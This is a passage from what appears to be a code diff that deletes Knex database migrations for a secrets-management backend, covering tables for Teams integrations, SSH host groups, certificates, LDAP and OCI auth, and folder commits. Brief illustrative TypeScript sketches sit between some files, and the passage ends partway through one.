"encryptedMicrosoftTeamsBotId"
);
if (
hasEncryptedMicrosoftTeamsClientIdColumn ||
hasEncryptedMicrosoftTeamsClientSecret ||
hasEncryptedMicrosoftTeamsBotId
) {
await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
if (hasEncryptedMicrosoftTeamsClientIdColumn) {
table.dropColumn("encryptedMicrosoftTeamsAppId");
}
if (hasEncryptedMicrosoftTeamsClientSecret) {
table.dropColumn("encryptedMicrosoftTeamsClientSecret");
}
if (hasEncryptedMicrosoftTeamsBotId) {
table.dropColumn("encryptedMicrosoftTeamsBotId");
}
});
}
if (await knex.schema.hasColumn(TableName.WorkflowIntegrations, "status")) {
await knex.schema.alterTable(TableName.WorkflowIntegrations, (table) => {
table.dropColumn("status");
});
}
if (await knex.schema.hasTable(TableName.ProjectMicrosoftTeamsConfigs)) {
await knex.schema.dropTableIfExists(TableName.ProjectMicrosoftTeamsConfigs);
await dropOnUpdateTrigger(knex, TableName.ProjectMicrosoftTeamsConfigs);
}
if (await knex.schema.hasTable(TableName.MicrosoftTeamsIntegrations)) {
await knex.schema.dropTableIfExists(TableName.MicrosoftTeamsIntegrations);
await dropOnUpdateTrigger(knex, TableName.MicrosoftTeamsIntegrations);
}
}
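
For reference, the two jsonb columns on ProjectMicrosoftTeamsConfigs are expected to hold one team plus the channels to notify within it, per the inline comments above. The sketch below only illustrates that assumed shape; the field names mirror the comments and every ID is made up.

// Minimal sketch (an assumption inferred from the inline comments above): each
// jsonb channel column stores one team and the channel IDs to notify within it.
type TeamsChannelSelection = {
  teamId: string;
  channelIds: string[];
};
// Hypothetical payload for a ProjectMicrosoftTeamsConfigs row; all IDs are illustrative.
const accessRequestChannels: TeamsChannelSelection = {
  teamId: "team-abc",
  channelIds: ["channel-1", "channel-2"]
};
const secretRequestChannels: TeamsChannelSelection = { teamId: "team-abc", channelIds: [] };
export const exampleTeamsConfig = {
  projectId: "proj_123",
  microsoftTeamsIntegrationId: "11111111-2222-3333-4444-555555555555",
  isAccessRequestNotificationEnabled: true,
  isSecretRequestNotificationEnabled: false,
  accessRequestChannels,
  secretRequestChannels
};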

View File

@@ -1,47 +0,0 @@
import { Knex } from "knex";
import { ProjectType, TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasDefaultUserCaCol = await knex.schema.hasColumn(TableName.ProjectSshConfig, "defaultUserSshCaId");
const hasDefaultHostCaCol = await knex.schema.hasColumn(TableName.ProjectSshConfig, "defaultHostSshCaId");
if (hasDefaultUserCaCol && hasDefaultHostCaCol) {
await knex.schema.alterTable(TableName.ProjectSshConfig, (t) => {
t.dropForeign(["defaultUserSshCaId"]);
t.dropForeign(["defaultHostSshCaId"]);
});
await knex.schema.alterTable(TableName.ProjectSshConfig, (t) => {
// allow nullable (does not wipe existing values)
t.uuid("defaultUserSshCaId").nullable().alter();
t.uuid("defaultHostSshCaId").nullable().alter();
// re-add with SET NULL behavior (previously CASCADE)
t.foreign("defaultUserSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("SET NULL");
t.foreign("defaultHostSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("SET NULL");
});
}
// (dangtony98): backfill by adding null default CAs for all existing Infisical SSH projects
// that do not yet have the associated ProjectSshConfig record introduced in Infisical SSH V2.
const allProjects = await knex(TableName.Project).where("type", ProjectType.SSH).select("id");
const projectsWithConfig = await knex(TableName.ProjectSshConfig).select("projectId");
const projectIdsWithConfig = new Set(projectsWithConfig.map((config) => config.projectId));
const projectsNeedingConfig = allProjects.filter((project) => !projectIdsWithConfig.has(project.id));
if (projectsNeedingConfig.length > 0) {
const configsToInsert = projectsNeedingConfig.map((project) => ({
projectId: project.id,
defaultUserSshCaId: null,
defaultHostSshCaId: null,
createdAt: new Date(),
updatedAt: new Date()
}));
await knex.batchInsert(TableName.ProjectSshConfig, configsToInsert);
}
}
export async function down(): Promise<void> {}

View File

@@ -1,23 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasAliasColumn = await knex.schema.hasColumn(TableName.SshHost, "alias");
if (!hasAliasColumn) {
await knex.schema.alterTable(TableName.SshHost, (t) => {
t.string("alias").nullable();
t.unique(["projectId", "alias"]);
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasAliasColumn = await knex.schema.hasColumn(TableName.SshHost, "alias");
if (hasAliasColumn) {
await knex.schema.alterTable(TableName.SshHost, (t) => {
t.dropUnique(["projectId", "alias"]);
t.dropColumn("alias");
});
}
}

View File

@@ -1,26 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
const hasTable = await knex.schema.hasTable(TableName.GithubOrgSyncConfig);
if (!hasTable) {
await knex.schema.createTable(TableName.GithubOrgSyncConfig, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("githubOrgName").notNullable();
t.boolean("isActive").defaultTo(false);
t.binary("encryptedGithubOrgAccessToken");
t.uuid("orgId").notNullable().unique();
t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE");
t.timestamps(true, true, true);
});
}
await createOnUpdateTrigger(knex, TableName.GithubOrgSyncConfig);
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.GithubOrgSyncConfig);
await dropOnUpdateTrigger(knex, TableName.GithubOrgSyncConfig);
}

View File

@@ -1,27 +0,0 @@
import { Knex } from "knex";
import { getConfig } from "@app/lib/config/env";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const appCfg = getConfig();
const tokenDuration = appCfg?.JWT_REFRESH_LIFETIME;
if (!(await knex.schema.hasColumn(TableName.Organization, "userTokenExpiration"))) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.string("userTokenExpiration");
});
if (tokenDuration) {
await knex(TableName.Organization).update({ userTokenExpiration: tokenDuration });
}
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.Organization, "userTokenExpiration")) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.dropColumn("userTokenExpiration");
});
}
}

View File

@@ -1,55 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.SshHostGroup))) {
await knex.schema.createTable(TableName.SshHostGroup, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.string("name").notNullable();
t.unique(["projectId", "name"]);
});
await createOnUpdateTrigger(knex, TableName.SshHostGroup);
}
if (!(await knex.schema.hasTable(TableName.SshHostGroupMembership))) {
await knex.schema.createTable(TableName.SshHostGroupMembership, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.uuid("sshHostGroupId").notNullable();
t.foreign("sshHostGroupId").references("id").inTable(TableName.SshHostGroup).onDelete("CASCADE");
t.uuid("sshHostId").notNullable();
t.foreign("sshHostId").references("id").inTable(TableName.SshHost).onDelete("CASCADE");
t.unique(["sshHostGroupId", "sshHostId"]);
});
await createOnUpdateTrigger(knex, TableName.SshHostGroupMembership);
}
const hasGroupColumn = await knex.schema.hasColumn(TableName.SshHostLoginUser, "sshHostGroupId");
if (!hasGroupColumn) {
await knex.schema.alterTable(TableName.SshHostLoginUser, (t) => {
t.uuid("sshHostGroupId").nullable();
t.foreign("sshHostGroupId").references("id").inTable(TableName.SshHostGroup).onDelete("CASCADE");
t.uuid("sshHostId").nullable().alter();
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasGroupColumn = await knex.schema.hasColumn(TableName.SshHostLoginUser, "sshHostGroupId");
if (hasGroupColumn) {
await knex.schema.alterTable(TableName.SshHostLoginUser, (t) => {
t.dropColumn("sshHostGroupId");
});
}
await knex.schema.dropTableIfExists(TableName.SshHostGroupMembership);
await dropOnUpdateTrigger(knex, TableName.SshHostGroupMembership);
await knex.schema.dropTableIfExists(TableName.SshHostGroup);
await dropOnUpdateTrigger(knex, TableName.SshHostGroup);
}

View File

@@ -1,44 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.Certificate)) {
const hasProjectIdColumn = await knex.schema.hasColumn(TableName.Certificate, "projectId");
if (!hasProjectIdColumn) {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.string("projectId", 36).nullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
});
await knex.raw(`
UPDATE "${TableName.Certificate}" cert
SET "projectId" = ca."projectId"
FROM "${TableName.CertificateAuthority}" ca
WHERE cert."caId" = ca.id
`);
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.string("projectId").notNullable().alter();
});
}
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.uuid("caId").nullable().alter();
t.uuid("caCertId").nullable().alter();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.Certificate)) {
if (await knex.schema.hasColumn(TableName.Certificate, "projectId")) {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.dropForeign("projectId");
t.dropColumn("projectId");
});
}
}
// Altering caId and caCertId back to notNullable is intentionally skipped; it would fail for rows where those columns are now null
}

View File

@@ -1,33 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.CertificateBody, "encryptedCertificateChain"))) {
await knex.schema.alterTable(TableName.CertificateBody, (t) => {
t.binary("encryptedCertificateChain").nullable();
});
}
if (!(await knex.schema.hasTable(TableName.CertificateSecret))) {
await knex.schema.createTable(TableName.CertificateSecret, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.uuid("certId").notNullable().unique();
t.foreign("certId").references("id").inTable(TableName.Certificate).onDelete("CASCADE");
t.binary("encryptedPrivateKey").notNullable();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.CertificateSecret)) {
await knex.schema.dropTable(TableName.CertificateSecret);
}
if (await knex.schema.hasColumn(TableName.CertificateBody, "encryptedCertificateChain")) {
await knex.schema.alterTable(TableName.CertificateBody, (t) => {
t.dropColumn("encryptedCertificateChain");
});
}
}

View File

@@ -1,47 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasEmail = await knex.schema.hasColumn(TableName.Users, "email");
const hasUsername = await knex.schema.hasColumn(TableName.Users, "username");
if (hasEmail) {
await knex(TableName.Users)
.where({ isGhost: false })
.update({
// @ts-expect-error email is assumed to be a string; this is expected
email: knex.raw("lower(email)")
});
}
if (hasUsername) {
await knex.schema.raw(`
CREATE INDEX IF NOT EXISTS ${TableName.Users}_lower_username_idx
ON ${TableName.Users} (LOWER(username))
`);
const duplicatesSubquery = knex(TableName.Users)
.select(knex.raw("lower(username) as lowercase_username"))
.groupBy("lowercase_username")
.having(knex.raw("count(*)"), ">", 1);
// Update usernames to lowercase where they won't create duplicates
await knex(TableName.Users)
.where({ isGhost: false })
.whereRaw("username <> lower(username)") // Only update if not already lowercase
// @ts-expect-error username is assumed to be a string; this is expected
.whereNotIn(knex.raw("lower(username)"), duplicatesSubquery)
.update({
// @ts-expect-error username is assumed to be a string; this is expected
username: knex.raw("lower(username)")
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasUsername = await knex.schema.hasColumn(TableName.Users, "username");
if (hasUsername) {
await knex.schema.raw(`
DROP INDEX IF EXISTS ${TableName.Users}_lower_username_idx
`);
}
}
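
The update above deliberately skips any username whose lowercase form would collide with another user's. Below is a small, self-contained sketch of that rule using made-up usernames; the real migration applies the same logic in SQL through the duplicates subquery.

// Hedged sketch of the collision rule with hypothetical data: a username is
// lowercased only if it is not already lowercase and lowercasing it would not
// collide with any other user's lowercased username.
const usernames = ["Alice@example.com", "alice@example.com", "Bob@example.com"];
const counts = new Map<string, number>();
for (const u of usernames) {
  const lower = u.toLowerCase();
  counts.set(lower, (counts.get(lower) ?? 0) + 1);
}
const wouldBeLowercased = usernames.filter(
  (u) => u !== u.toLowerCase() && (counts.get(u.toLowerCase()) ?? 0) === 1
);
// Only "Bob@example.com" qualifies; both "Alice" variants are left untouched because
// lowercasing them would produce duplicate usernames.
console.log(wouldBeLowercased); // ["Bob@example.com"]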

View File

@@ -1,22 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.SshHostLoginUserMapping, "groupId"))) {
await knex.schema.alterTable(TableName.SshHostLoginUserMapping, (t) => {
t.uuid("groupId").nullable();
t.foreign("groupId").references("id").inTable(TableName.Groups).onDelete("CASCADE");
t.unique(["sshHostLoginUserId", "groupId"]);
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.SshHostLoginUserMapping, "groupId")) {
await knex.schema.alterTable(TableName.SshHostLoginUserMapping, (t) => {
t.dropUnique(["sshHostLoginUserId", "groupId"]);
t.dropColumn("groupId");
});
}
}

View File

@@ -1,166 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
if (!hasFolderCommitTable) {
await knex.schema.createTable(TableName.FolderCommit, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.bigIncrements("commitId");
t.jsonb("actorMetadata").notNullable();
t.string("actorType").notNullable();
t.string("message");
t.uuid("folderId").notNullable();
t.uuid("envId").notNullable();
t.foreign("envId").references("id").inTable(TableName.Environment).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderId");
t.index("envId");
});
}
const hasFolderCommitChangesTable = await knex.schema.hasTable(TableName.FolderCommitChanges);
if (!hasFolderCommitChangesTable) {
await knex.schema.createTable(TableName.FolderCommitChanges, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.uuid("folderCommitId").notNullable();
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
t.string("changeType").notNullable();
t.boolean("isUpdate").notNullable().defaultTo(false);
t.uuid("secretVersionId");
t.foreign("secretVersionId").references("id").inTable(TableName.SecretVersionV2).onDelete("CASCADE");
t.uuid("folderVersionId");
t.foreign("folderVersionId").references("id").inTable(TableName.SecretFolderVersion).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderCommitId");
t.index("secretVersionId");
t.index("folderVersionId");
});
}
const hasFolderCheckpointTable = await knex.schema.hasTable(TableName.FolderCheckpoint);
if (!hasFolderCheckpointTable) {
await knex.schema.createTable(TableName.FolderCheckpoint, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.uuid("folderCommitId").notNullable();
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderCommitId");
});
}
const hasFolderCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderCheckpointResources);
if (!hasFolderCheckpointResourcesTable) {
await knex.schema.createTable(TableName.FolderCheckpointResources, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.uuid("folderCheckpointId").notNullable();
t.foreign("folderCheckpointId").references("id").inTable(TableName.FolderCheckpoint).onDelete("CASCADE");
t.uuid("secretVersionId");
t.foreign("secretVersionId").references("id").inTable(TableName.SecretVersionV2).onDelete("CASCADE");
t.uuid("folderVersionId");
t.foreign("folderVersionId").references("id").inTable(TableName.SecretFolderVersion).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderCheckpointId");
t.index("secretVersionId");
t.index("folderVersionId");
});
}
const hasFolderTreeCheckpointTable = await knex.schema.hasTable(TableName.FolderTreeCheckpoint);
if (!hasFolderTreeCheckpointTable) {
await knex.schema.createTable(TableName.FolderTreeCheckpoint, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.uuid("folderCommitId").notNullable();
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderCommitId");
});
}
const hasFolderTreeCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderTreeCheckpointResources);
if (!hasFolderTreeCheckpointResourcesTable) {
await knex.schema.createTable(TableName.FolderTreeCheckpointResources, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.uuid("folderTreeCheckpointId").notNullable();
t.foreign("folderTreeCheckpointId").references("id").inTable(TableName.FolderTreeCheckpoint).onDelete("CASCADE");
t.uuid("folderId").notNullable();
t.uuid("folderCommitId").notNullable();
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderTreeCheckpointId");
t.index("folderId");
t.index("folderCommitId");
});
}
if (!hasFolderCommitTable) {
await createOnUpdateTrigger(knex, TableName.FolderCommit);
}
if (!hasFolderCommitChangesTable) {
await createOnUpdateTrigger(knex, TableName.FolderCommitChanges);
}
if (!hasFolderCheckpointTable) {
await createOnUpdateTrigger(knex, TableName.FolderCheckpoint);
}
if (!hasFolderCheckpointResourcesTable) {
await createOnUpdateTrigger(knex, TableName.FolderCheckpointResources);
}
if (!hasFolderTreeCheckpointTable) {
await createOnUpdateTrigger(knex, TableName.FolderTreeCheckpoint);
}
if (!hasFolderTreeCheckpointResourcesTable) {
await createOnUpdateTrigger(knex, TableName.FolderTreeCheckpointResources);
}
}
export async function down(knex: Knex): Promise<void> {
const hasFolderCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderCheckpointResources);
const hasFolderTreeCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderTreeCheckpointResources);
const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
const hasFolderCommitChangesTable = await knex.schema.hasTable(TableName.FolderCommitChanges);
const hasFolderTreeCheckpointTable = await knex.schema.hasTable(TableName.FolderTreeCheckpoint);
const hasFolderCheckpointTable = await knex.schema.hasTable(TableName.FolderCheckpoint);
if (hasFolderTreeCheckpointResourcesTable) {
await dropOnUpdateTrigger(knex, TableName.FolderTreeCheckpointResources);
await knex.schema.dropTableIfExists(TableName.FolderTreeCheckpointResources);
}
if (hasFolderCheckpointResourcesTable) {
await dropOnUpdateTrigger(knex, TableName.FolderCheckpointResources);
await knex.schema.dropTableIfExists(TableName.FolderCheckpointResources);
}
if (hasFolderTreeCheckpointTable) {
await dropOnUpdateTrigger(knex, TableName.FolderTreeCheckpoint);
await knex.schema.dropTableIfExists(TableName.FolderTreeCheckpoint);
}
if (hasFolderCheckpointTable) {
await dropOnUpdateTrigger(knex, TableName.FolderCheckpoint);
await knex.schema.dropTableIfExists(TableName.FolderCheckpoint);
}
if (hasFolderCommitChangesTable) {
await dropOnUpdateTrigger(knex, TableName.FolderCommitChanges);
await knex.schema.dropTableIfExists(TableName.FolderCommitChanges);
}
if (hasFolderCommitTable) {
await dropOnUpdateTrigger(knex, TableName.FolderCommit);
await knex.schema.dropTableIfExists(TableName.FolderCommit);
}
}
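
Illustrative row shapes for the two central tables created above, inferred directly from the column definitions; the project's actual generated schema types may differ in naming and optionality.

// Sketch only: row types inferred from the table definitions above.
export interface FolderCommitRow {
  id: string; // uuid
  commitId: string; // bigIncrements; pg drivers typically surface bigints as strings
  actorMetadata: Record<string, unknown>;
  actorType: string;
  message?: string | null;
  folderId: string;
  envId: string; // FK -> Environment.id, CASCADE on delete
  createdAt: Date;
  updatedAt: Date;
}
export interface FolderCommitChangeRow {
  id: string;
  folderCommitId: string; // FK -> FolderCommit.id, CASCADE on delete
  changeType: string;
  isUpdate: boolean;
  secretVersionId?: string | null; // FK -> SecretVersionV2.id
  folderVersionId?: string | null; // FK -> SecretFolderVersion.id
  createdAt: Date;
  updatedAt: Date;
}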

View File

@@ -1,22 +0,0 @@
import { Knex } from "knex";
import { ProjectType, TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.ProjectTemplates, "type"))) {
await knex.schema.alterTable(TableName.ProjectTemplates, (t) => {
// default to secret manager (sm) so existing templates get a type during this migration; new ones will always specify it on creation
t.string("type").defaultTo(ProjectType.SecretManager).notNullable();
t.jsonb("environments").nullable().alter();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.ProjectTemplates, "type")) {
await knex.schema.alterTable(TableName.ProjectTemplates, (t) => {
t.dropColumn("type");
// not reverting nullable environments
});
}
}

View File

@@ -1,39 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.IdentityLdapAuth))) {
await knex.schema.createTable(TableName.IdentityLdapAuth, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.bigInteger("accessTokenTTL").defaultTo(7200).notNullable();
t.bigInteger("accessTokenMaxTTL").defaultTo(7200).notNullable();
t.bigInteger("accessTokenNumUsesLimit").defaultTo(0).notNullable();
t.jsonb("accessTokenTrustedIps").notNullable();
t.uuid("identityId").notNullable().unique();
t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
t.binary("encryptedBindDN").notNullable();
t.binary("encryptedBindPass").notNullable();
t.binary("encryptedLdapCaCertificate").nullable();
t.string("url").notNullable();
t.string("searchBase").notNullable();
t.string("searchFilter").notNullable();
t.jsonb("allowedFields").nullable();
t.timestamps(true, true, true);
});
}
await createOnUpdateTrigger(knex, TableName.IdentityLdapAuth);
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.IdentityLdapAuth);
await dropOnUpdateTrigger(knex, TableName.IdentityLdapAuth);
}

View File

@@ -1,46 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.PkiSubscriber))) {
await knex.schema.createTable(TableName.PkiSubscriber, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.uuid("caId").nullable();
t.foreign("caId").references("id").inTable(TableName.CertificateAuthority).onDelete("SET NULL");
t.string("name").notNullable();
t.string("commonName").notNullable();
t.specificType("subjectAlternativeNames", "text[]").notNullable();
t.string("ttl").notNullable();
t.specificType("keyUsages", "text[]").notNullable();
t.specificType("extendedKeyUsages", "text[]").notNullable();
t.string("status").notNullable(); // active / disabled
t.unique(["projectId", "name"]);
});
await createOnUpdateTrigger(knex, TableName.PkiSubscriber);
}
const hasSubscriberCol = await knex.schema.hasColumn(TableName.Certificate, "pkiSubscriberId");
if (!hasSubscriberCol) {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.uuid("pkiSubscriberId").nullable();
t.foreign("pkiSubscriberId").references("id").inTable(TableName.PkiSubscriber).onDelete("SET NULL");
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasSubscriberCol = await knex.schema.hasColumn(TableName.Certificate, "pkiSubscriberId");
if (hasSubscriberCol) {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.dropColumn("pkiSubscriberId");
});
}
await knex.schema.dropTableIfExists(TableName.PkiSubscriber);
await dropOnUpdateTrigger(knex, TableName.PkiSubscriber);
}

View File

@@ -1,30 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.IdentityOciAuth))) {
await knex.schema.createTable(TableName.IdentityOciAuth, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.bigInteger("accessTokenTTL").defaultTo(7200).notNullable();
t.bigInteger("accessTokenMaxTTL").defaultTo(7200).notNullable();
t.bigInteger("accessTokenNumUsesLimit").defaultTo(0).notNullable();
t.jsonb("accessTokenTrustedIps").notNullable();
t.timestamps(true, true, true);
t.uuid("identityId").notNullable().unique();
t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
t.string("type").notNullable();
t.string("tenancyOcid").notNullable();
t.string("allowedUsernames").nullable();
});
}
await createOnUpdateTrigger(knex, TableName.IdentityOciAuth);
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.IdentityOciAuth);
await dropOnUpdateTrigger(knex, TableName.IdentityOciAuth);
}

View File

@@ -1,25 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasGatewayIdColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "gatewayId");
if (!hasGatewayIdColumn) {
await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
table.uuid("gatewayId").nullable();
table.foreign("gatewayId").references("id").inTable(TableName.Gateway).onDelete("SET NULL");
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasGatewayIdColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "gatewayId");
if (hasGatewayIdColumn) {
await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
table.dropForeign("gatewayId");
table.dropColumn("gatewayId");
});
}
}

View File

@@ -1,112 +0,0 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
import { getMigrationEncryptionServices } from "./utils/services";
// Note(daniel): We aren't dropping tables or columns in this migration so we can easily roll back if needed.
// In the future we need to drop the projectGatewayId column on the dynamic secrets table and drop the project_gateways table entirely.
const BATCH_SIZE = 500;
export async function up(knex: Knex): Promise<void> {
// eslint-disable-next-line no-param-reassign
knex.replicaNode = () => {
return knex;
};
if (!(await knex.schema.hasColumn(TableName.DynamicSecret, "gatewayId"))) {
await knex.schema.alterTable(TableName.DynamicSecret, (table) => {
table.uuid("gatewayId").nullable();
table.foreign("gatewayId").references("id").inTable(TableName.Gateway).onDelete("SET NULL");
table.index("gatewayId");
});
const existingDynamicSecretsWithProjectGatewayId = await knex(TableName.DynamicSecret)
.select(selectAllTableCols(TableName.DynamicSecret))
.whereNotNull(`${TableName.DynamicSecret}.projectGatewayId`)
.join(TableName.ProjectGateway, `${TableName.ProjectGateway}.id`, `${TableName.DynamicSecret}.projectGatewayId`)
.whereNotNull(`${TableName.ProjectGateway}.gatewayId`)
.select(
knex.ref("projectId").withSchema(TableName.ProjectGateway).as("projectId"),
knex.ref("gatewayId").withSchema(TableName.ProjectGateway).as("projectGatewayGatewayId")
);
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const updatedDynamicSecrets = await Promise.all(
existingDynamicSecretsWithProjectGatewayId.map(async (existingDynamicSecret) => {
if (!existingDynamicSecret.projectGatewayGatewayId) {
const result = {
...existingDynamicSecret,
gatewayId: null
};
const { projectId, projectGatewayGatewayId, ...rest } = result;
return rest;
}
const { decryptor: secretManagerDecryptor } = await kmsService.createCipherPairWithDataKey({
type: KmsDataKey.SecretManager,
projectId: existingDynamicSecret.projectId
});
const { encryptor: secretManagerEncryptor } = await kmsService.createCipherPairWithDataKey({
type: KmsDataKey.SecretManager,
projectId: existingDynamicSecret.projectId
});
let decryptedStoredInput = JSON.parse(
secretManagerDecryptor({ cipherTextBlob: Buffer.from(existingDynamicSecret.encryptedInput) }).toString()
) as object;
// We're not removing the existing projectGatewayId from the input so we can easily roll back without having to re-encrypt the input
decryptedStoredInput = {
...decryptedStoredInput,
gatewayId: existingDynamicSecret.projectGatewayGatewayId
};
const encryptedInput = secretManagerEncryptor({
plainText: Buffer.from(JSON.stringify(decryptedStoredInput))
}).cipherTextBlob;
const result = {
...existingDynamicSecret,
encryptedInput,
gatewayId: existingDynamicSecret.projectGatewayGatewayId
};
const { projectId, projectGatewayGatewayId, ...rest } = result;
return rest;
})
);
for (let i = 0; i < updatedDynamicSecrets.length; i += BATCH_SIZE) {
// eslint-disable-next-line no-await-in-loop
await knex(TableName.DynamicSecret)
.insert(updatedDynamicSecrets.slice(i, i + BATCH_SIZE))
.onConflict("id")
.merge();
}
}
}
export async function down(knex: Knex): Promise<void> {
// no re-encryption needed as we keep the old projectGatewayId in the input
if (await knex.schema.hasColumn(TableName.DynamicSecret, "gatewayId")) {
await knex.schema.alterTable(TableName.DynamicSecret, (table) => {
table.dropForeign("gatewayId");
table.dropColumn("gatewayId");
});
}
}
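
The heart of the backfill above is a decrypt, augment, re-encrypt round trip on encryptedInput. The sketch below isolates that step; the Cipher type stands in for the KMS cipher pair returned by createCipherPairWithDataKey, and its signatures are an assumption made purely for illustration.

// Hedged sketch of the decrypt -> augment -> re-encrypt step. The cipher functions
// stand in for the project's KMS data-key pair; their real signatures are assumed here.
type Cipher = {
  decrypt: (cipherTextBlob: Buffer) => Buffer;
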